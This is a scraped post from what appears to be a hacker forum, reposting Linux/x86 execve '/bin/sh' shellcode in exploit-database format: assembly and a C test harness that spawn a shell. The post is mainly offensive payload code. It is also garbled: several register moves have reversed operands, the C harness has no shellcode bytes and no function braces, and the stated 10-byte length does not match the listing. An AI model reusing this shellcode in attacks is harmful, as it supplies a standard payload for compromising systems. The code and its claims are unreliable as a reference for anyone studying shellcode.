• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

Linux/x86 execve/bin/shShellcode


Recommended Posts

# Exploit Title: Linux/x86 - execve "/bin/sh" (10 bytes)
# Google Dork: None
# Exploit Author: cybersaki
# Vendor Homepage: None
# Software Link: None
# Version: None
# Tested on: Kali linux 2020.2a i386 x86
# CVE : none
# Shellcode-length : 10
# SLAE-id : Purchased | chivaljazz@gmail.com
# Reference : http://shell-storm.org/shellcode/files/shellcode-811.php
global _start
section .text
xor    eax, eax      ; zero our eax
push   eax
; push   0x68732f2f
mov eax, 0xd0e65e5e
ror eax, 1                       ; shift the register by 1 ro right
push eax
; push   0x6e69622f
add eax, 0x5f63300               ; add 5f63300 to eax register to push 6e69622f                                       
push eax
mov    esp,ebx
mov    eax,ecx
mov    eax,edx
mov    al,0xb
int    0x80
; End section for exit call
xor    eax,eax
inc    eax
int    0x80
unsigned char code[] = \
int main()
        printf("Shellcode Length:  %d\n", strlen(code));
        int (*ret)() = (int(*)())code;


Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now